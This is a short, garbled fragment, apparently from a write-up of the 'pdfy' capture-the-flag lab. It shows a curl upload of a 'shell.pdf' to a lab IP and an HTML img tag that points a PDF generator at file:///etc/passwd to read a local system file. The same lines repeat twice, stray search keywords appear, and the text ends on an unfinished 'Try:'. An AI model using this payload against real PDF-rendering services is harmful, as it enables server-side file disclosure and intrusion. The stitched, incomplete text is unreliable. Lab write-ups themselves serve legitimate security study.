$ curl -X POST -F "file=@shell.pdf" 10.10.11.206:8080/upload
<img src="file:///etc/passwd">
The exploitation path usually pivots on identifying the specific tool generating the PDFs. pdfy htb writeup upd
Try:
$ curl -X POST -F "file=@shell.pdf" 10.10.11.206:8080/upload
<img src="file:///etc/passwd">
The exploitation path usually pivots on identifying the specific tool generating the PDFs.
Try: